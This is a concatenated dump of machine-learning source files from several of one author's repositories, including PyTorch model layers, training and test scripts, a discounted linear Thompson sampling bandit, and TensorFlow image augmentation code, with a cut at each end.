optimizer.load_state_dict(checkpoint['optimizer']) ```
{ "source": "0shimax/pytorch-EncNet", "score": 3 }
#### File: src/model/utils.py ```python import torch from torch import nn def calculate_l1_loss(output, target, lagrange_coef=0.0005): l1_crit = nn.L1Loss(size_average=False) # SmoothL1Loss reg_loss = l1_crit(output.argmax(dim=1).float(), target.float()) return lagrange_coef * reg_loss def smooth_in(model): l_noise = [] for i, p in enumerate(model.parameters()): noise = torch.FloatTensor(p.shape).uniform_(-.01, .01) p.data -= noise l_noise.append(noise) # model.parameters()[i] = p return l_noise def smooth_out(model, l_noise): for i, (p, noise) in enumerate(zip(model.parameters(), l_noise)): p.data += noise l_noise.append(noise) # model.parameters()[i] = p # return l_noise ```
{ "source": "0shimax/pytorch-examples", "score": 3 }
#### File: 0shimax/pytorch-examples/ind_rnn_net.py ```python import torch import torch.nn.functional as F from torch.nn.parameter import Parameter from torch.autograd import Variable import numpy class IndRNN(torch.nn.Module): def __init__(self, num_input_units, num_units, recurrent_max_abs=25., non_linearity=F.relu): super().__init__() recurrent_max_abs = min(recurrent_max_abs, 1.0 / numpy.sqrt(num_units)) self.input_kernel = Parameter(torch.zeros(num_units, num_input_units)) self.recurrent_kernel = Parameter( torch.Tensor(num_units,).uniform_( -recurrent_max_abs, recurrent_max_abs)) self.bias = Parameter(torch.zeros(num_units,)) self.non_linearity = non_linearity self.num_units = num_units self.recurrent_max_abs = recurrent_max_abs self.reset_state() def reset_state(self): self.h = Variable(torch.zeros(self.num_units)) def set_hidden_state(self, state): self.h = state def clip_recurrent_kernel(self): self.recurrent_kernel.data.copy_( torch.clamp(self.recurrent_kernel.data, max=self.recurrent_max_abs, min=-self.recurrent_max_abs)) def forward(self, x): self.clip_recurrent_kernel() output = self.non_linearity( F.linear(x, self.input_kernel, self.bias) + F.mul(self.recurrent_kernel, self.h)) # self.clip_recurrent_kernel() # recurrent_update = self.h.mul( # self.recurrent_kernel.expand_as(self.h)) # gate_inputs += recurrent_update.expand_as(gate_inputs) # gate_inputs += self.bias.expand_as(gate_inputs) # output = self.non_linearity(gate_inputs) return output class EncDec(torch.nn.Module): def __init__(self, in_size, h_unit_size, slot_size, memory_size): super().__init__() self.encorder = IndRNN(in_size, h_unit_size) self.decorder = IndRNN(in_size, h_unit_size) self.hidden_to_output = torch.nn.Linear(h_unit_size, in_size) self.is_train = True def reset_state(self): self.encorder.reset_state() self.decorder.reset_state() def train_step(self, xs, ys): for time_idx in reversed(range(1, xs.shape[1])): dec_h = self.decorder(xs[:, time_idx]) out = self.hidden_to_output(dec_h) ys.append(out.data) self.loss += (xs[:, time_idx-1] - out)**2 return ys def predict(self, xs, ys, out): for time_idx in reversed(range(1, xs.shape[1])): dec_h = self.decorder(out) out = self.hidden_to_output(dec_h) ys.append(out.data) return ys def forward(self, xs): n_batch, n_times, dim_obs = xs.shape for time_idx in range(n_times): x = xs[:, time_idx] h = self.encorder(x) self.decorder.set_hidden_state(h) ys = [] out = self.hidden_to_output(self.decorder.h) ys.append(out) self.loss = (xs[:, -1] - out)**2 if self.is_train: self.out = self.train_step(xs, ys) else: self.out = self.predict(xs, ys, out) self.loss /= n_times self.loss = self.loss.sum()/n_batch return self.loss ```
{ "source": "0shimax/pytorch-fat-deep-ffm", "score": 3 }
#### File: src/feature/build.py ```python from typing import List import pandas from pathlib import Path from xfeat import SelectCategorical, ConcatCombination, LabelEncoder, Pipeline, SelectNumerical def read_df(root_dir:str, path:str, categorical_cols:List[str], exclude_cols:List[str]=["imp_time"]): df = pandas.read_csv(Path(root_dir, path)) df = df.astype({c:str for c in categorical_cols}) encoder = Pipeline([ SelectCategorical(exclude_cols=exclude_cols), LabelEncoder(output_suffix=""), ]) df_encoded = pandas.concat([SelectNumerical().fit_transform(df), encoder.fit_transform(df)], axis=1) return df_encoded ``` #### File: src/model/cen_layer.py ```python from typing import Callable import torch import torch.nn as nn class ComposeExcitationNetworkLayer(nn.Module): r"""Layer class of Compose Excitation Network (CEN) / Squeeze-and-Excitation Network (SENET). Compose Excitation Network was used in FAT-Deep :title:`Junlin Zhang et al, 2019`[1] and Squeeze-and-Excitation Network was used in FibiNET :title:`Tongwen Huang et al, 2019`[2] #. compose field-aware embedded tensors by a 1D convolution with a :math:`1 * 1` kernel feature-wisely from a :math:`k * n` tensor of field i into a :math:`k * 1` tensor. #. concatenate the tensors and feed them to dense network to calculate attention weights. #. inputs' tensor are multiplied by attention weights, and return outputs tensor with shape = (B, N * N, E). :Reference: #. `<NAME> et al, 2019. FAT-DeepFFM: Field Attentive Deep Field-aware Factorization Machine <https://arxiv.org/abs/1905.06336>`_. #. `<NAME> et al, 2019. FibiNET: Combining Feature Importance and Bilinear feature Interaction for Click-Through Rate Prediction <https://arxiv.org/abs/1905.09433>`_. """ def __init__(self, num_fields: int, reduction: int = 1, activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()): r"""Initialize ComposeExcitationNetworkLayer Args: num_fields (int): Number of inputs' fields. reduction (int, optional): Size of reduction in dense layer. Defaults to 1. activation (Callable[[T], T], optional): Activation function in dense layers. Defaults to nn.ReLU(). Attributes: pooling (torch.nn.Module): Adaptive average pooling layer to compose tensors. fc (torch.nn.Sequential): Sequential of linear and activation to calculate weights of attention, which the linear layers are: :math:`[Linear(N^2, \frac{N^2}{reduction}), Linear(\frac{N^2}{reduction}, N^2)]`. """ # refer to parent class super(ComposeExcitationNetworkLayer, self).__init__() # initialize 1d pooling layer self.pooling = nn.AdaptiveAvgPool1d(1) # initialize dense layers squared_num_fields = num_fields ** 2 reduced_num_fields = squared_num_fields // reduction self.fc = nn.Sequential() self.fc.add_module("ReductionLinear", nn.Linear(squared_num_fields, reduced_num_fields)) self.fc.add_module("ReductionActivation", activation) self.fc.add_module("AdditionLinear", nn.Linear(reduced_num_fields, squared_num_fields)) self.fc.add_module("AdditionActivation", activation) def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor: r"""Forward calculation of ComposeExcitationNetworkLayer Args: emb_inputs (T), shape = (B, N, E), dtype = torch.float: Field aware embedded features tensors. Returns: T, shape = (B, N, E), dtype = torch.float: Output of ComposeExcitationNetworkLayer. """ # Pool emb_inputs # inputs: emb_inputs, shape = (B, N, E) <- EM_i (n_feild, embed_size) # output: pooled_inputs, shape = (B, N, 1) pooled_inputs = self.pooling(emb_inputs.rename(None)) pooled_inputs.names = ("B", "N", "E") # Flatten pooled_inputs # inputs: pooled_inputs, shape = (B, N, 1) # output: pooled_inputs, shape = (B, N) pooled_inputs = pooled_inputs.flatten(["N", "E"], "N") # Calculate attention weight with dense layer forwardly # inputs: pooled_inputs, shape = (B, N) # output: attn_w, shape = (B, N) attn_w = self.fc(pooled_inputs.rename(None)) attn_w.names = ("B", "N") # Un-flatten attention weights and apply it to emb_inputs # inputs: attn_w, shape = (B, N) # inputs: emb_inputs, shape = (B, N, E) # output: outputs, shape = (B, N, E) attn_w = attn_w.unflatten("N", (("N", attn_w.size("N")), ("E", 1))) # Multiply attentional weights on field embedding tensors ## outputs = emb_inputs * attn_w outputs = torch.einsum("ijk,ijh->ijk", [emb_inputs.rename(None), attn_w.rename(None)]) outputs.names = ("B", "N", "E") return outputs, attn_w ``` #### File: src/model/dnn_layer.py ```python from typing import Callable, List import torch import torch.nn as nn class MultilayerPerceptionLayer(nn.Module): r"""Layer class of Multilayer Perception (MLP), which is also called fully connected layer, dense layer, deep neural network, etc, to calculate high order non linear relations of features with a stack of linear, dropout and activation. """ def __init__(self, inputs_size: int, output_size: int, layer_sizes: List[int], dropout_p: List[float] = None, activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()): """Initialize MultilayerPerceptionLayer Args: inputs_size (int): Input size of MLP, i.e. size of embedding tensor. output_size (int): Output size of MLP layer_sizes (List[int]): Layer sizes of MLP dropout_p (List[float], optional): Probability of Dropout in MLP. Defaults to None. activation (Callable[[T], T], optional): Activation function in MLP. Defaults to nn.ReLU(). Attributes: inputs_size (int): Input size of MLP. model (torch.nn.Sequential): Sequential of MLP. Raises: ValueError: when embed_size or num_fields is missing if using embed_size and num_field pairs, or when inputs_size is missing if using inputs_size ValueError: when dropout_p is not None and length of dropout_p is not equal to that of layer_sizes """ # refer to parent class super(MultilayerPerceptionLayer, self).__init__() # check if length of dropout_p is not equal to length of layer_sizes if dropout_p is not None and len(dropout_p) != len(layer_sizes): raise ValueError("length of dropout_p must be equal to length of layer_sizes.") # bind inputs_size to inputs_size self.inputs_size = inputs_size # create a list of inputs_size and layer_sizes layer_sizes = [inputs_size] + layer_sizes layers = [] # initialize module of linear, activation and dropout, and add them to sequential module for i, (in_f, out_f) in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])): layers.append(nn.Linear(in_f, out_f)) if activation is not None: layers.append(activation) if dropout_p is not None: layers.append(nn.Dropout(dropout_p[i])) # initialize module of linear and add it to sequential module layers.append(nn.Linear(layer_sizes[-1], output_size)) # initialize sequential of model self.model = nn.Sequential(*layers) def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor: r"""Forward calculation of MultilayerPerceptionLayer Args: emb_inputs (T), shape = (B, N, E), dtype = torch.float: Embedded features tensors. Returns: T, shape = (B, N, O), dtype = torch.float: Output of MLP. """ # Calculate with model forwardly # inputs: emb_inputs, shape = (B, N, E) # output: outputs, shape = (B, N, O) outputs = self.model(emb_inputs.rename(None)) # Rename tensor names if outputs.dim() == 2: outputs.names = ("B", "O") elif outputs.dim() == 3: outputs.names = ("B", "N", "O") return outputs ``` #### File: src/model/embed_layer.py ```python from typing import List import torch import torch.nn as nn import numpy class EmbedingLayer(nn.Module): def __init__(self, num_numerical_fields: int, num_categorical_fields: int, num_ids: List[int], embed_size: int, device: str="cpu"): super(EmbedingLayer, self).__init__() # map id=0 if id is NULL. that's why adding a aditional dimention. if num_numerical_fields>0: self.conv = nn.Conv1d(1, embed_size*2, 1) self.num_numerical_fields = num_numerical_fields self.num_categorical_fields = num_categorical_fields self.embed_size = embed_size # bind num_field to the length of field_sizes self.num_fields = len(num_ids) # create ModuleList of nn.Embedding for each field of inputs # map id=0 if id is NULL. that's why adding a aditional dimention. self.embeddings = nn.ModuleList([ nn.Embedding(sum(num_ids)+1, embed_size) for _ in range(self.num_fields) ]) # create offsets to re-index inputs by adding them up ## self.offsets = torch.Tensor((0, *np.cumsum(num_ids)[:-1])).long().unsqueeze(0) self.offsets = torch.Tensor((0, *numpy.cumsum(num_ids)[:-1])).long() self.offsets.names = ("N",) self.offsets = self.offsets.unflatten("N", [("B", 1), ("N", self.offsets.size("N"))]) self.offsets.to(device) # initialize nn.Embedding with xavier_uniform_ initializer for embedding in self.embeddings: nn.init.xavier_uniform_(embedding.weight.data) def forward(self, X_categorical: List[torch.Tensor], X_numerical: torch.Tensor = None ) -> torch.Tensor: X_categorical = X_categorical + self.offsets X_categorical = X_categorical.rename(None) if X_numerical is None: outputs = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1) outputs.names = ("B", "N", "E") return outputs numerical_emb = self.conv(X_numerical).reshape(-1, self.num_numerical_fields*2, self.embed_size) cat_emb = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1) outputs = torch.cat([numerical_emb, cat_emb], dim=1) outputs.names = ("B", "N", "E") return outputs ```
{ "source": "0shimax/Pytorch-KDEncoding", "score": 3 }
#### File: Pytorch-KDEncoding/src/train.py ```python import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from models.kdencoding import SimpleKDEncoding class NGramLanguageModeler(nn.Module): def __init__(self, vocab_size, embedding_dim, context_size): super().__init__() self.kd_enc = SimpleKDEncoding( vocab_size, k_concept=2, k_character=2, D=4) self.embeddings = nn.Linear(4, embedding_dim) # self.embeddings = nn.Embedding(vocab_size, embedding_dim) self.linear1 = nn.Linear(context_size * embedding_dim, 128) self.linear2 = nn.Linear(128, vocab_size) def forward(self, inputs): kd = self.kd_enc(inputs) kd = kd.type(torch.FloatTensor) embeds = self.embeddings(kd).view((1, -1)) # embeds = self.embeddings(inputs).view((1, -1)) out = F.relu(self.linear1(embeds)) out = self.linear2(out) log_probs = F.log_softmax(out, dim=1) return log_probs CONTEXT_SIZE = 2 EMBEDDING_DIM = 10 # We will use Shakespeare Sonnet 2 test_sentence = """When forty winters shall besiege thy brow, And dig deep trenches in thy beauty's field, Thy youth's proud livery so gazed on now, Will be a totter'd weed of small worth held: Then being asked, where all thy beauty lies, Where all the treasure of thy lusty days; To say, within thine own deep sunken eyes, Were an all-eating shame, and thriftless praise. How much more praise deserv'd thy beauty's use, If thou couldst answer 'This fair child of mine Shall sum my count, and make my old excuse,' Proving his beauty by succession thine! This were to be new made when thou art old, And see thy blood warm when thou feel'st it cold.""".split() # we should tokenize the input, but we will ignore that for now # build a list of tuples. Each tuple is ([ word_i-2, word_i-1 ], target word) trigrams = [([test_sentence[i], test_sentence[i + 1]], test_sentence[i + 2]) for i in range(len(test_sentence) - 2)] # print the first 3, just so you can see what they look like print(trigrams[:3]) vocab = set(test_sentence) word_to_ix = {word: i for i, word in enumerate(vocab)} print("voc size:", len(vocab)) losses = [] loss_function = nn.NLLLoss() model = NGramLanguageModeler(len(vocab), EMBEDDING_DIM, CONTEXT_SIZE) optimizer = optim.SGD(model.parameters(), lr=0.001) for epoch in range(300): total_loss = 0 for context, target in trigrams: # Step 1. Prepare the inputs to be passed to the model (i.e, turn the words # into integer indices and wrap them in tensors) context_idxs = torch.LongTensor([[word_to_ix[w] for w in context]]) # Step 2. Recall that torch *accumulates* gradients. Before passing in a # new instance, you need to zero out the gradients from the old # instance model.zero_grad() # Step 3. Run the forward pass, getting log probabilities over next # words log_probs = model(context_idxs) # Step 4. Compute your loss function. (Again, Torch wants the target # word wrapped in a tensor) loss = loss_function(log_probs, torch.LongTensor([word_to_ix[target]])) # Step 5. Do the backward pass and update the gradient loss.backward() optimizer.step() # Get the Python number from a 1-element Tensor by calling tensor.item() total_loss += loss.item() losses.append(total_loss) print(losses) # The loss decreased every iteration over the training data! context_idxs = torch.LongTensor([[word_to_ix[w] for w in ['made', 'make']]]) log_probs = model.kd_enc(context_idxs, debug=True) ```
{ "source": "0shimax/pytorch-sam-lr", "score": 3 }
#### File: src/model/lr.py ```python import torch import torch.nn as nn import torch.nn.functional as F class LrNet(nn.Module): def __init__(self, in_dim, n_class=2): super(LrNet, self).__init__() self.fc1 = nn.Linear(in_dim, 256) self.fc2 = nn.Linear(256, 256) self.fc3 = nn.Linear(256, n_class) def forward(self, x): h = F.relu(self.fc1(x)) h = F.dropout(h) h = F.relu(self.fc2(h)) h = F.dropout(h) out = self.fc3(h) return out.squeeze(1) ```
{ "source": "0shimax/PyTorch-SoftTriple", "score": 3 }
#### File: src/feature/data_loader_for_NFCM.py ```python import torchvision import torch from torch.utils.data import Dataset import numpy as np import random # ラベル クラス # 0 T-シャツ/トップ (T-shirt/top) # 1 ズボン (Trouser) # 2 プルオーバー (Pullover) # 3 ドレス (Dress) # 4 コート (Coat) # 5 サンダル (Sandal) # 6 シャツ (Shirt) # 7 スニーカー (Sneaker) # 8 バッグ (Bag) # 9 アンクルブーツ (Ankle boot) near_cat_dict = {0:[0,1,5,6,7,9], 1:[0,1,2,5,6,7,9], 2:[1,2,5,7], 3:[3,4,8], 4:[1,4,6,8,9], 5:[0,1,5,6], 6:[1,5,6,7,9], 7:[0,1,6,7], 8:[3,4,8,9], 9:[1,4,6,8,9]} # far_cat = {0:[], 1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[]} class FMNISTDataset(Dataset): def __init__(self, n_class=10, train=True): super().__init__() self.n_class = n_class self.train = train self.n_relation = self.n_class**2 self.fashion_mnist_data = torchvision.datasets.FashionMNIST( './fashion-mnist', transform=torchvision.transforms.ToTensor(), train=train, download=True) self.labels = [fnmn[1] for fnmn in torchvision.datasets.FashionMNIST('./fashion-mnist')] self.labels = np.array(self.labels, dtype=np.int32) def __len__(self): return len(self.fashion_mnist_data) def __getitem__(self, idx): image, cat = self.fashion_mnist_data[idx] return image, cat def loader(dataset, batch_size, shuffle=True): loader = torch.utils.data.DataLoader( dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0) return loader ```
{ "source": "0shimax/SE-Wavenet", "score": 3 }
#### File: src/features/diff_dim_seq.py ```python import numpy as np import itertools def add_diff_features(features): seq_len, n_dim = features.shape comb = list(itertools.combinations(range(n_dim), 2)) add_mat = np.empty([seq_len, len(comb)], dtype=np.float32) for i_add, cmb in enumerate(comb): add_mat[:, i_add] = features[:, cmb[0]] - features[:, cmb[1]] return np.concatenate((features, add_mat), axis=1) ``` #### File: SE-Wavenet/src/test.py ```python import argparse from pathlib import Path import torch import torch.nn.functional as F from sklearn.metrics import precision_recall_fscore_support, roc_curve, auc import matplotlib.pyplot as plt import numpy as np from data.data_loader import ActivDataset, loader from models.focal_loss import FocalLoss from models.ete_waveform import EteWave from models.post_process import as_seaquence torch.manual_seed(555) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print("device:", device) def main(args): model = EteWave(args.n_class).to(device) if Path(args.resume_model).exists(): print("load model:", args.resume_model) model.load_state_dict(torch.load(args.resume_model)) test_data_file_names =\ [line.rstrip() for line in open(args.test_data_file_pointer_path)] test_dataset = ActivDataset(test_data_file_names, args.root_dir, seq_len=args.test_seq_len, time_step=args.time_step, is_train=False) test_loader = loader(test_dataset, 1, shuffle=False) test(args, model, test_loader) def test(args, model, data_loader): model.eval() test_loss = 0 segmentation_correct = 0 lack_classifier_correct = 0 total_len = 0 lack_total_len = 0 true_seq_labels = [] inf_seq_labels = [] true_finish_labels = [] inf_finish_labels = [] inf_finish_proba = [] true_finish_labels_mat = np.empty([len(data_loader), 5]) inf_finish_labels_mat = np.empty([len(data_loader), 5]) with torch.no_grad(): for i_batch, (l_data, l_target, l_lack_labels) in enumerate(data_loader): l_data = l_data.to(device) l_target = l_target.to(device) l_lack_labels = l_lack_labels.to(device) total_len += l_target.shape[-1] lack_total_len += l_lack_labels.shape[-1] output = model(l_data) output = output.view([-1, output.shape[-1]]) targets = l_target.view(-1) test_loss += F.cross_entropy(output, targets, ignore_index=-1).item() pred = output.argmax(1) pred = as_seaquence(pred.detach(), ahead=7) segmentation_correct += pred.eq(targets.view_as(pred)).sum().item() model.tatc.select_data_per_labels(l_data, pred, device) tatc_output = model.tatc() test_loss += F.cross_entropy(tatc_output, l_lack_labels.reshape(-1)).item() tatc_pred = tatc_output.argmax(1) print("true:", l_lack_labels[0]) print("inference:", tatc_pred) lack_classifier_correct += tatc_pred.eq(l_lack_labels.view_as(tatc_pred)).sum().item() true_seq_labels += targets.view_as(pred).cpu().tolist() inf_seq_labels += pred.cpu().tolist() lack_labels_cpu = l_lack_labels.view_as(tatc_pred).cpu().tolist() tatc_pred_cpu = tatc_pred.cpu().tolist() true_finish_labels += lack_labels_cpu inf_finish_labels += tatc_pred_cpu inf_finish_proba += tatc_output[:, 1].view(-1).cpu().tolist() true_finish_labels_mat[i_batch] = lack_labels_cpu inf_finish_labels_mat[i_batch] = tatc_pred_cpu test_loss /= len(data_loader.dataset) print('\nTest set: Average loss: {:.4f}, Seg Accuracy: {}/{} ({:.0f}%), lack Accuracy: {}/{} ({:.0f}%)\n' .format(test_loss, segmentation_correct, total_len, 100. * segmentation_correct / total_len, lack_classifier_correct, lack_total_len, 100. * lack_classifier_correct / lack_total_len)) print("seq f1:") print(precision_recall_fscore_support(true_seq_labels, inf_seq_labels)) print("finish work:") print(precision_recall_fscore_support(true_finish_labels, inf_finish_labels)) fpr, tpr, _ = roc_curve(true_finish_labels, inf_finish_proba) plt.plot(fpr, tpr) plt.savefig( Path(args.out_dir, 'finish_roc.png') ) print("finish work AUC:") print(auc(fpr, tpr)) for i in range(args.n_class -1): print("class {}:".format(i)) print(precision_recall_fscore_support(true_finish_labels_mat[:, i], inf_finish_labels_mat[:, i])) print("低速:") print(precision_recall_fscore_support(true_finish_labels_mat[:5, :].ravel(), inf_finish_labels_mat[:5, :].ravel())) print("中速:") print(precision_recall_fscore_support(true_finish_labels_mat[5:10, :].ravel(), inf_finish_labels_mat[5:10, :].ravel())) print("高速:") print(precision_recall_fscore_support(true_finish_labels_mat[10:15, :].ravel(), inf_finish_labels_mat[10:15, :].ravel())) for i in range(5): start = 15+i*3 end = 15+(i+1)*3 print("作業{}中断再開:".format(i+1)) print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel())) for i in range(5): start = 30+i*3 end = 30+(i+1)*3 print("作業{}中断:".format(i+1)) print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel())) for i in range(5): start = 45+i*3 end = 45+(i+1)*3 print("作業{}欠損:".format(i+1)) print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel())) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--root_dir', default='/home/sh70k/mnt/tracker_data/test', help='path to dataset') parser.add_argument('--n-class', type=int, default=6, help='number of class') parser.add_argument('--test_seq-len', type=int, default=200, help='fixed seaquence length') parser.add_argument('--time-step', type=float, default=.25, help='fixed time interbal of input data') parser.add_argument('--test-data-file-pointer-path', default='./data/test_data_file_pointer', help='path to test data file pointer') parser.add_argument('--resume-model', default='/home/sh70k/mnt/tracker_data/results/model_ckpt_v1_average.pth', help='path to trained model') parser.add_argument('--workers', type=int, help='number of data loading workers', default=4) parser.add_argument('--batch-size', type=int, default=1, help='input batch size') parser.add_argument('--out-dir', default='/home/sh70k/mnt/tracker_data/results', help='folder to output data and model checkpoints') args = parser.parse_args() Path(args.out_dir).mkdir(parents=True, exist_ok=True), main(args) ```
{ "source": "0shimax/SW-TS", "score": 3 }
#### File: SW-TS/src/DLinTS.py ```python import numpy as np from math import log from numpy.linalg import pinv # from numpy import linalg as LA # from scipy.stats import truncnorm import scipy from dataclasses import dataclass # from arm import ArmGaussian @dataclass class DLinTS(object): """ Implementation of the class for the Discounted Follow-The-Gaussian-Perturbed-Leader param: - d: dimension of the action vectors (feature dimension) - delta: probability of theta in the confidence bound - alpha: tuning the exploration parameter - lambda_: regularization parameter - s: constant such that L2 norm of theta smaller than s - gamma: discount parameter - name: additional suffix when comparing several policies (optional) - sm: Should Sherman-Morisson formula be used for inverting matrices ? - sigma_noise: square root of the variance of the noise - verbose: To print information - omniscient: Does the policy knows when the breakpoints happen ? ACTION NORMS ARE SUPPOSED TO BE BOUNDED BE 1 """ dim: int delta: float alpha: float lambda_: float # s: float # l: float gamma: float sigma_noise: float verbose: bool # = True # S-M cannot be used with this model for the moment sm: bool # = False # omniscient: bool # = False t: int = None gamma2_t: float = None def __post_init__(self): ''' build attributes ''' # first term in square root self.c_delta = 2 * log(1 / self.delta) ''' attributes for the re-init ''' # model parameter self.hat_theta = np.zeros(self.dim) # Design Matrix self.cov = self.lambda_ * np.identity(self.dim) # Design Square Matrix self.cov_squared = self.lambda_ * np.identity(self.dim) self.invcov = 1 / self.lambda_ * np.identity(self.dim) self.b = np.zeros(self.dim) self.t = 0 self.gamma2_t = 1.0 def update_state(self, features:np.ndarray, reward:float): """ Updating the main parameters for the model param: - features: Feature used for updating - reward: Reward used for updating Output: ------- Nothing, but the class instances are updated """ assert isinstance(features, np.ndarray), 'np.array required' aat = np.outer(features, features.T) self.gamma2_t *= self.gamma ** 2 self.cov = self.gamma * self.cov + aat + (1-self.gamma) * self.lambda_ * np.identity(self.dim) self.cov_squared = self.gamma ** 2 * self.cov_squared + aat + (1 - self.gamma ** 2) * self.lambda_ * np.identity(self.dim) self.b = self.gamma * self.b + reward * features # const1 = np.sqrt(self.lambda_) * self.s # beta_t = const1 + self.sigma_noise *\ # np.sqrt(self.c_delta + self.dim * np.log(1 + self.l**2 *(1-self.gamma2_t)/(self.dim * self.lambda_*(1 - self.gamma**2)))) self.gamma2_t *= self.gamma ** 2 if not self.sm: self.invcov = pinv(self.cov) else: raise NotImplementedError("Method SM is not implemented for D-LinTS") z = np.random.multivariate_normal(np.zeros(self.dim), np.eye(self.dim)) self.hat_theta = np.inner(self.invcov, self.b + self.alpha * np.dot(scipy.linalg.sqrtm(self.cov_squared).real, z)) if self.verbose: print('AAt:', aat) print('Policy was updated at time t= ' + str(self.t)) print('Reward received =', reward) self.t += 1 def calculate_win_rate(self, features:np.ndarray): assert isinstance(features, np.ndarray), 'np.array required' return features.dot(self.hat_theta)[0][0] def __str__(self): return 'D-LinTS' @staticmethod def id(): return 'D-LinTS' ```
{ "source": "0shimax/tensorflow-layers-examples", "score": 3 }
#### File: scripts/data_loader/augmentation.py ```python import tensorflow as tf from tensorflow.python.framework import ops from tensorflow.python.framework import dtypes from tensorflow.python.ops import math_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import array_ops import random from random import randint rand_seed = 555 random.seed(555) scaling_factor = [0.5, 0.625, 0.75, 0.875, 1, 1.125, 1.25, 1.375, 1.5] shift_factor = [0 , 16, 32, 48, 64] def augment(image, multiple): xh, xw, xch = image.get_shape().as_list() # Randomly flip the image horizontally. image = tf.image.random_flip_left_right(image, seed=rand_seed) image = tf.image.random_flip_up_down(image, seed=rand_seed) image = tf.image.random_contrast(image, lower=0.2, upper=1.8, seed=rand_seed) image = tf.image.random_brightness(image, max_delta=63, seed=rand_seed) # k = randint(0, 3) # # rot90 has bug. now skip rot. # # rot90 is not affine transformation. # image = rot90(image, k=k) # # offset image # image = shift(image, h, w) # image = scaling(image, multiple, h, w, ch) # h, w, ch = image.get_shape().as_list() # print(h, w, ch) return image def scaling(image, multiple, h, w, ch): # h, w, ch = image.get_shape().as_list() scale = randint(0, len(scaling_factor)-1) new_sz = [int(h*scale)+1, int(w*scale)+1] # scaling image = tf.image.resize_images(image, new_sz) xh, xw, ch = image.get_shape().as_list() m0, m1 = xh % multiple, xw % multiple d0, d1 = randint(0, m0), randint(0, m1) image = tf.random_crop(image, [xh-m0, xw-m1, ch], seed=rand_seed) return image def shift(image, h, w): x_shift_idx = randint(0, len(shift_factor)-1) y_shift_idx = randint(0, len(shift_factor)-1) x_shift = shift_factor[x_shift_idx] y_shift = shift_factor[y_shift_idx] print(x_shift, y_shift, h, w) image = tf.image.pad_to_bounding_box(image, x_shift, y_shift, h-x_shift, w-y_shift) return image def rot90(image, k=1, name=None): """Rotate an image counter-clockwise by 90 degrees. Args: image: A 3-D tensor of shape `[height, width, channels]`. k: A scalar integer. The number of times the image is rotated by 90 degrees. name: A name for this operation (optional). Returns: A rotated 3-D tensor of the same type and shape as `image`. """ with ops.name_scope(name, 'rot90', [image, k]) as scope: image = ops.convert_to_tensor(image, name='image') _Check3DImage(image, require_static=False) k = ops.convert_to_tensor(k, dtype=dtypes.int32, name='k') k.get_shape().assert_has_rank(0) k = math_ops.mod(k, 4) def _rot90(): return array_ops.transpose(array_ops.reverse_v2(image, [1]), [1, 0, 2]) def _rot180(): return array_ops.reverse_v2(image, [0, 1]) def _rot270(): return array_ops.reverse_v2(array_ops.transpose(image, [1, 0, 2]), [1]) cases = [(math_ops.equal(k, 1), _rot90), (math_ops.equal(k, 2), _rot180), (math_ops.equal(k, 3), _rot270)] ret = control_flow_ops.case(cases, default=lambda: image, exclusive=True, name=scope) h, w, ch = image.get_shape().as_list() if k==1 or k==3: shape = [w, h] else: shape = [h, w] ret.set_shape(shape+[ch]) return ret def _Check3DImage(image, require_static=True): """Assert that we are working with properly shaped image. Args: image: 3-D Tensor of shape [height, width, channels] require_static: If `True`, requires that all dimensions of `image` are known and non-zero. Raises: ValueError: if `image.shape` is not a 3-vector. Returns: An empty list, if `image` has fully defined dimensions. Otherwise, a list containing an assert op is returned. """ try: image_shape = image.get_shape().with_rank(3) except ValueError: raise ValueError("'image' (shape %s) must be three-dimensional." % image.shape) if require_static and not image_shape.is_fully_defined(): raise ValueError("'image' (shape %s) must be fully defined." % image_shape) if any(x == 0 for x in image_shape): raise ValueError("all dims of 'image.shape' must be > 0: %s" % image_shape) if not image_shape.is_fully_defined(): return [check_ops.assert_positive(array_ops.shape(image), ["all dims of 'image.shape' " "must be > 0."])] else: return [] from skimage.transform import rotate from skimage.transform import warp from skimage.transform import ProjectiveTransform def rotate(X, intensity): for i in range(X.shape[0]): delta = 30. * intensity # scale using augmentation intensity X[i] = rotate(X[i], random.uniform(-delta, delta), mode = 'edge') return X def apply_projection_transform(X, intensity): image_size = X.shape[1] d = image_size * 0.3 * intensity for i in range(X.shape[0]): tl_top = random.uniform(-d, d) # Top left corner, top margin tl_left = random.uniform(-d, d) # Top left corner, left margin bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin bl_left = random.uniform(-d, d) # Bottom left corner, left margin tr_top = random.uniform(-d, d) # Top right corner, top margin tr_right = random.uniform(-d, d) # Top right corner, right margin br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin br_right = random.uniform(-d, d) # Bottom right corner, right margin transform = ProjectiveTransform() transform.estimate(np.array(( (tl_left, tl_top), (bl_left, image_size - bl_bottom), (image_size - br_right, image_size - br_bottom), (image_size - tr_right, tr_top) )), np.array(( (0, 0), (0, image_size), (image_size, image_size), (image_size, 0) ))) X[i] = warp(X[i], transform, output_shape=(image_size, image_size), order = 1, mode = 'edge') return X ``` #### File: scripts/functions/spp.py ```python import tensorflow as tf import numpy as np def max_pool_2d_nxn_regions(inputs, output_size: int, mode: str): """ Performs a pooling operation that results in a fixed size: output_size x output_size. Used by spatial_pyramid_pool. Refer to appendix A in [1]. Args: inputs: A 4D Tensor (B, H, W, C) output_size: The output size of the pooling operation. mode: The pooling mode {max, avg} Returns: A list of tensors, for each output bin. The list contains output_size * output_size elements, where each elment is a Tensor (N, C). References: [1] <NAME> et al (2015): Spatial 